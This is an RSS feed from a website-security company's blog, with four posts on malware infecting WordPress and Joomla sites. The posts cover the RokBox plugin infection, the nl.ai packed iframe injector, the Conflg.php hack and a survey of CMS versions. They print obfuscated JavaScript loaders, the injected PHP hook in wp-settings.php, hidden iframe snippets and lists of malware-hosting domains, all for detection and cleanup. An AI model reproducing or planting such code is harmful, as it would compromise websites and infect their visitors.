<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com &#187; Wordpress</title>
	<atom:link href="http://www.stopthehacker.com/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Sat, 04 Feb 2012 01:14:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>RokBox.js Infections</title>
		<link>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/</link>
		<comments>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/#comments</comments>
		<pubDate>Fri, 09 Dec 2011 06:00:36 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklist]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[rokbox]]></category>
		<category><![CDATA[RokBox.js]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3208</guid>
		<description><![CDATA[Today&#8217;s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one&#8217;s website through vulnerabilities in the plugin itself. A prime example of this is the Timthumb malware outbreak that [...]]]></description>
			<content:encoded><![CDATA[<p>Today&#8217;s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one&#8217;s website through vulnerabilities in the plugin itself.</p>
<p>A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed. </p>
<p><strong>What does a third party plugin do?</strong><br />
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.</p>
<p>Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.</p>
<p><strong>What is RokBox?</strong><br />
According to the RocketTheme website, on which RokBox is hosted, RokBox &#8220;is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.&#8221; It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.</p>
<p><em>More details about RokBox: <a href="http://www.rockettheme.com/extensions-joomla/rokbox">Joomla Extensions &#8211; RokBox</a>.</em></p>
<p><strong>How do I identify the malicious code?</strong><br />
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia. </p>
<p>A sample of the actual malware is shown below:</p>
<pre class="brush: jscript; title: ; notranslate">
var _0xdc8d=[&quot;\x73\x63\x5F\x63\x6F&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68&quot;,&quot;\x77\x69\x64\x74\x68&quot;,&quot;\x68\x65\x69\x67\x68\x74&quot;,&quot;\x63\x68\x61\x72\x73\x65\x74&quot;,&quot;\x6C\x6F\x63\x61\x74\x69\x6F\x6E&quot;,&quot;\x72\x65\x66\x65\x72\x72\x65\x72&quot;,&quot;\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64&quot;];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
</pre>
<p>A sample of the benign RokBox code is shown below:</p>
<pre class="brush: jscript; title: ; notranslate">
/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c&amp;lt;a?'':e(parseInt(c/a)))+((c=c%a)&amp;gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};
</pre>
<p><strong>Is my site infected?</strong><br />
To find out if your site is infected, search for the strings &#8220;_0xdc8d&#8221;, &#8220;refurl&#8221;, and &#8220;\x63&#8243; all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installations are up to date. It is a good practice to change all your access passwords as well to ensure your security.</p>
<p><strong>How should I protect my site</strong><br />
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website right now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/12/08/rokbox-js-infections/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>nl.ai p,a,c,k,e,d Malware</title>
		<link>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/</link>
		<comments>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 00:00:16 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisting]]></category>
		<category><![CDATA[dean edwards]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[packed]]></category>
		<category><![CDATA[packer]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=3132</guid>
		<description><![CDATA[Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever. One popular method for infecting WordPress powered websites is to infect a file called &#8220;wp-settings.php&#8221;. The malware is then spread from this file to all subsequent requests for [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever. </p>
<p>One popular method for infecting WordPress powered websites is to infect a file called &#8220;wp-settings.php&#8221;. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.</p>
<p><strong>The malware</strong><br />
Usually the malware shown below will appear at the top of the page in the <head> section of a webpage. Please check your source code.</p>
<p>Malware sample:</p>
<pre class="brush: jscript; title: ; notranslate">
&lt;script&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u(&quot;9()&quot;,y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
&lt;/script&gt;
</pre>
<p><strong>Steps to remove the malware</strong></p>
<ol>
<li>Access your hosting account SSH or SFTP</li>
<li>Remove the malware inserted into the file &#8220;wp_inc/upd.php&#8221; located in your &#8220;/tmp&#8221; folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers! )</li>
<li>Remove the following code from the file &#8220;wp-settings.php&#8221;, usually found in your WordPress installation directory</li>
</ol>
<pre class="brush: jscript; title: ; notranslate">
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . ‘/wp_inc’)){
readfile($t_d . ‘/wp_inc’);
}
}
add_action(‘wp_head’, ‘check_wordpress’);
do_action( ‘init’ );
</pre>
<p><strong>What does the malware do?</strong><br />
Th injected PHP code causes your WordPress installation to load the malware located inside a file named &#8220;wp_inc/upd.php&#8221; (usually in your &#8220;/tmp&#8221; folder). The malware then builds an Iframe element pointing to one of many different websites.</p>
<p>Malware destination sites:</p>
<pre class="brush: plain; title: ; notranslate">
hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/
</pre>
<p><strong>How did this happen?</strong><br />
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.</p>
<p>Additionally, make sure your WordPress install is up-to-date and that all third party plugins, like timthumb are updated too.</p>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Conflg.php Hack</title>
		<link>http://www.stopthehacker.com/2011/10/21/conflg-php-hacks/</link>
		<comments>http://www.stopthehacker.com/2011/10/21/conflg-php-hacks/#comments</comments>
		<pubDate>Fri, 21 Oct 2011 15:00:13 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[conflg.php. config]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=2795</guid>
		<description><![CDATA[One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time time of our post. This number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts. What is the purpose [...]]]></description>
			<content:encoded><![CDATA[<p>One of the latest attacks we are tracking on the Internet has already infected about 250 websites at the time time of our post. This number is growing rapidly. We will be posting more details regarding the Conflg.php Hack and the reason it is infecting benign websites in our forthcoming posts.</p>
<p><strong>What is the purpose of the Conflg.php Hack?</strong><br />
This particular attack creates a file called &#8220;Conflg.php&#8221; in the user&#8217;s hosting account. These malicious hackers apparently named the file &#8220;Conflg.php&#8221; in the hope that the name looks similar to the &#8220;config.php&#8221; file found in Worpress installations and many other CMS software. In most cases, the goal of the website infection is to prompt visitors to install a password stealing Trojan onto their PCs.</p>
<p>The password stealing Trojan is loaded from sites including the following:</p>
<pre class="brush: plain; title: ; notranslate">
ddiziizlet.com
coasttocoastdesigns.com
vironit.com
uwc-ibo.org
sbodewatergeus.nl
homeautoelectric.by.ru
auto-software.biz
dcuo.be
bischwiller-echecs.com
</pre>
<p>The malware contained in Conflg.php looks like the following:</p>
<pre class="brush: jscript; title: ; notranslate">
var s=new String();try{document[0][1]}catch(q){if(q)r=1;c=Str ing;}if(r&amp;&amp;document.createTextNode)y=2;e=eval;m=[4.5*y,18/y,52.5*y,204/y,16*y,80/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,206/y,50.5*y,232/y,34.5*y,216/y,50.5*y,218/y,50.5*y,220/y,58*y,230/y,33*y,242/y,42*y,194/y,51.5*y,156/y,48.5*y,218/y,50.5*y,80/y,19.5*y,196/y,55.5*y,200/y,60.5*y,78/y,20.5*y,182/y,24*y,186/y,20.5*y,246/y,4.5*y,18/y,4.5*y,210/y,51*y,228/y,48.5*y,218/y,50.5*y,228/y,20*y,82/y,29.5*y,18/y,4.5*y,250/y,16*y,202/y,54*y,230/y,50.5*y,64/y,61.5*y,18/y,4.5*y,18/y,50*y,222/y,49.5*y,234/y,54.5*y,202/y,55*y,232/y,23*y,238/y,57*y,210/y,58*y,202/y,20*y[snipped],mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e(&quot;m&quot;+&quot;[&quot;+&quot;i&quot;+']'));try{document.appendChild(null)}catch(q){e(s);}
</pre>
<p><strong>Why do malicious hackers use obfuscated filenames?</strong><br />
The primary reason is to confuse the website owner about the legitimacy of the files contents. Since the owner thinks that the file containing the malware code is actually a legitimate file that is associated with the software powering the website, when this is in fact not the case, the contents of the file are unlikely to be deleted.</p>
<p><strong>How do I know if my site is infected?</strong><br />
Check your website for the existence of a file named &#8220;Conflg.php&#8221; or the contents shown above. Additionally, please be extra vigilant if your website is hosted by Softlayer, or ThePlanet, as a majority of sites with this infection seem to have been hosted there (within their IP blocks).</p>
<p><strong>How do I protect my site?</strong><br />
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.</p>
<p>StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to <a href="http://www.stopthehacker.com/contact/">contact us</a>. You can also visit our <a href="http://www.stopthehacker.com/services/">services page</a> to protect your website now.</p>
<p>Till next time&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2011/10/21/conflg-php-hacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analyzing Popular CMSs: Are WordPress Users at Risk?</title>
		<link>http://www.stopthehacker.com/2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/</link>
		<comments>http://www.stopthehacker.com/2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/#comments</comments>
		<pubDate>Tue, 02 Feb 2010 20:00:22 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[safety]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[website]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1186</guid>
		<description><![CDATA[Following up on our last article, this time we will be discussing issues relevant to, likely, the most popular CMS software package available today: WordPress.  WordPress, is used by a plethora of individuals and organizations, from bloggers to content publishers, news media outlets and many more. The great thing about this particular CMS is the [...]]]></description>
			<content:encoded><![CDATA[<p>Following up on our <a href="http://www.stopthehacker.com/2010/01/29/analyzing-popular-cmses-sites-using-joomla/" target="_blank">last article</a>, this time we will be discussing issues relevant to, likely, the most popular CMS software package available today: <a href="http://wordpress.org/" target="_blank">WordPress</a>.  <a href="http://wordpress.org/" target="_blank">WordPress</a>, is used by a plethora of individuals and organizations, from bloggers to content publishers, news media outlets and many more. The great thing about this particular CMS is the level to which it can be customized and the number of plugins that exist for it.</p>
<p><a href="http://wordpress.org/" target="_blank">WordPress</a> is a prime example of a popular CMS. With more than <a href="http://wordpress.org/extend/plugins/" target="_blank">8,176 plugins</a> and 73,037,498 downloads, this particular CMS package is extremely popular! I would agree with the statement on the WordPress site which proclaims: &#8220;WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.&#8221; It is.</p>
<p><a href="http://wordpress.org/" target="_blank">WordPress</a> also offers the flexibility to manage content easily, add attractive themes and customize webpages to your hearts content. And again quoting the main site: &#8220;Plugins can extend <a href="http://wordpress.org/" target="_blank">WordPress</a> to do almost anything you can imagine.&#8221; I would agree with this too.</p>
<p>In this post we will be looking at <a href="http://wordpress.org/" target="_blank">WordPress</a> closely to understand any interesting properties of the active installations publicly seen on the Internet.</p>
<p><strong>The aim of this experiment:</strong></p>
<ul>
<li>To determine the number of <a href="http://wordpress.org/" target="_blank">WordPress</a> sites using older versions of the CMS package (and hence vulnerable to attacks).</li>
<li>What are the associated scripts do <a href="http://wordpress.org/" target="_blank">WordPress</a> users use in addition to core <a href="http://wordpress.org/" target="_blank">WordPress</a> functionality?</li>
<li>What are the vulnerabilities of using the associated scripts?</li>
</ul>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 100,000 websites was mined (via <a href="http://www.google.com" target="_blank">Google</a>) using a keyword search to locate websites which discussed <a href="http://wordpress.org/" target="_blank">WordPress</a>. Understandably, not all 100,000 websites would actually be using <a href="http://wordpress.org/" target="_blank">WordPress</a>. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by <a href="http://wordpress.org/" target="_blank">WordPress</a> or its associated plugins. Each website was then cross-referenced with the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing List</a>. This experiment was conducted between January 28th and January 30th, 2010.</p>
<p><strong>Distribution of WordPress versions:</strong></p>
<ul>
<li>30.9% of sites were running version 2.9.1</li>
<li>4.7% of sites were running version 2.9</li>
<li>9.14% of sites were running version 2.8.6</li>
<li>4.7% of sites were running version 2.8.5</li>
<li>21.42% of sites were running version 2.8.4</li>
<li>7.1% of sites were running version 2.8.2</li>
<li>9.14% of sites were running version 2.7.1</li>
<li>2.3% of sites were running version 2.6.2</li>
<li>2.3% of sites were running version 2.6</li>
<li>2.3% of sites were running version 2.1.3</li>
<li>2.3% of sites were running version 2.0.4</li>
</ul>
<p>We found the following distribution of <a href="http://wordpress.org/" target="_blank">WordPress</a> versions in the websites examined (where versions of installations could be determined).<br />
<em>Note: <a href="http://www.google.com/search?q=site%3Amilw0rm.com+wordpress+exploit" target="_blank">Publicly available information about exploits for WordPress version &lt; 2.8.6 exist</a>.</em></p>
<p><strong>We present the most interesting results in brief:</strong></p>
<ul>
<li>Only 0.18% of the <a href="http://wordpress.org/" target="_blank">WordPress</a> sites were blacklisted by <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing</a>.</li>
<li>Only 1.6% of <a href="http://wordpress.org/" target="_blank">WordPress</a> sites had Iframes embedded in them. We found that all these<a href="http://wordpress.org/" target="_blank"></a> sites harbored Iframe based malware. The Iframes were not obfuscated (<em>examples provided below</em>)</li>
<li> 44.4% of <a href="http://wordpress.org/" target="_blank">WordPress</a> sites which had Iframes were using JQuery.<br />
<em>Note: <a href="http://www.stopthehacker.com/2009/12/09/when-benign-scripts-attack-v/" target="_blank">JQuery has been known to be targeted by malicious hackers as a code-injection delivery mechanism</a>.</em></li>
<li>About 7.2% of all <a href="http://wordpress.org/" target="_blank">WordPress</a> sites use jQuery.</li>
<li>None of the <a href="http://wordpress.org/" target="_blank">WordPress</a> sites use Mootools.</li>
<li>None of the <a href="http://wordpress.org/" target="_blank">WordPress</a> sites use AC_RunActiveContent.js.</li>
</ul>
<p><strong>Examples of malware found:</strong></p>
<p>Now we present some examples of the non-obfuscated malware that was detected on some of the analyzed sites.</p>
<p>Example Code #1,  detected on: olgamake.com/wp-login.php?action=lostpassword</p>
<pre class="brush: plain; title: ; notranslate">
&lt;if ra e src=&quot;hxxp://a151.scrappi ng.cc:80 80/ts/in. cgi ?op en&quot; width=971 height=0 style=&quot;visibility: hi dden&quot;&gt;&lt;/i fra m e&gt;
</pre>
<p>Example Code #2,  detected on: makinghimknown.com/wp-login.php</p>
<pre class="brush: plain; title: ; notranslate">
&lt;if ra e src=&quot;src=&quot;hxxp://ke ymydoma ins.com/&quot; width=&quot;3&quot; height=&quot;2&quot;&gt;&lt;/i fra m e&gt;
</pre>
<p>Example Code #3,  detected on: bisoppreview.com/wp-login.php</p>
<pre class="brush: plain; title: ; notranslate">
&lt;if ra e src=&quot;hxxp://ntw porta l.com/&quot; w idth=&quot;2&quot; hei ght=&quot;4&quot;&lt;/i fra m e&gt;
</pre>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that there are many older <a href="http://wordpress.org/" target="_blank">WordPress</a> installations active on the Internet. Furthermore, some of them are have been infected by non-obfuscated Iframes which point to malicious websites to load exploit code dynamically. <a href="http://wordpress.org/" target="_blank">WordPress</a> makes for an easy target by lieu of its popularity and wide installation base. The people associated with this CMS software take security very seriously and have done a great job releasing security patches and stable releases. However, the fact remains that vulnerable versions of <a href="http://wordpress.org/" target="_blank">WordPress</a> are live on the Internet and are hosting malware, primarily via infected Iframes.</p>
<p>Till next time.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/02/analyzing-popular-cmses-are-wordpress-users-at-risk/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

